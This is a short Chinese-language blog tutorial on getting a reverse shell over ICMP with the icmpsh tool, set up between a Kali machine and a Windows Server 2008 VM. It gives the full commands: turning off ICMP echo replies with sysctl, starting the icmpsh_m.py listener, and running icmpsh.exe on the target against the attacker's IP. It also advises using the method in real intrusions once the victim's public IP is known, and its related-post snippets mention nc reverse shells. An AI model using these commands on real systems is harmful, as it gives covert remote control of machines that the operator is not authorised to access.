使用ICMP協議反彈shell

2022-07-13 11:30:14 字數 1087 閱讀 5513

icmpsh是乙個簡單的反向icmp shell,與其他類似**shell的工具相比,他的主要優勢在於它不需要管理許可權即可執行到目標計算機上,畢竟icmp協議誰都可以用。

準備兩台虛擬機器

kali.2020              192.168.244.128

windows server-2008 192.168.130

接下來利用這兩台主機進行試驗,目的是將window的shell**到kali中

第一步,先關閉kali自身的icmp

sysctl -w net.ipv4.icmp_echo_ignore_all=1
第二部,在kali上執行icmpsh_m.py部分人執行python指令碼時可能會報這個錯誤

you need to install python impacket library first
報錯說的也很明白,少impacket庫,用pip裝就完事兒了,怎麼裝就不在贅述了

在kali上執行下面的命令

命令格式:python icmpsh_m.py 《源ip> 《目的ip>

python icmpsh_m.py 192.168.244.128 192.168.244.130
然後在windows上執行icmpsh.exe

icmpsh.exe -t 192.168.244.128
檢視kali,回彈shell成功

用wireshark進行抓包,確實是在用icmp進行通訊

icmp協議作為在內網穿透中的利器,在做內網滲透時運用的還是比較多的,在做這個實驗時我本來是想將虛擬機器中的shell彈到一台公網伺服器上,但是沒有成功,原因是兩台主機必須都有公網ip,所以在實戰時要用到icmpsh的話,先使用其他方法獲取到被控主機的公網ip吧。

通過ICMP協議反彈SHELL並執行命令

因此,為了獲得shell並在目標主機上執行命令,可以使用icmp協議作為隱藏通道進行連線。開發了乙個自動化過程的指令碼。此指令碼所需的唯一輸入是目標主機的 ip位址。該指令碼包含在 icmpsh 中。工具有多個選項 的命令和控制。在nishang 框架中包含乙個 powershell 模組,可以與 ...

ICMP協議和ICMP協議

一 icmp協議 因為ip協議不提供可靠的傳輸服務,也不提供端到端或點到點的確認,如果出錯可以通過icmp報告來看,它是在ip模組中實現。tcp ip協議設計的icmp協議就是為了彌補ip協議的不足。它是tcp ip協議族的乙個子協議,用於在ip主機 路由器之間傳遞控制訊息。控制訊息指網路通不通 主...

使用NC命令反彈Shell

本文使用兩台電腦操作,一台是kali 192.168.0.23 一台是mac 192.168.0.24 有些電腦不支援,而且跟機器使用順序還有關係。比如我在kali上 192.168.0.23 輸入 root kali nc l 1234在mac上 192.168.0.24 輸入 nc 192.16...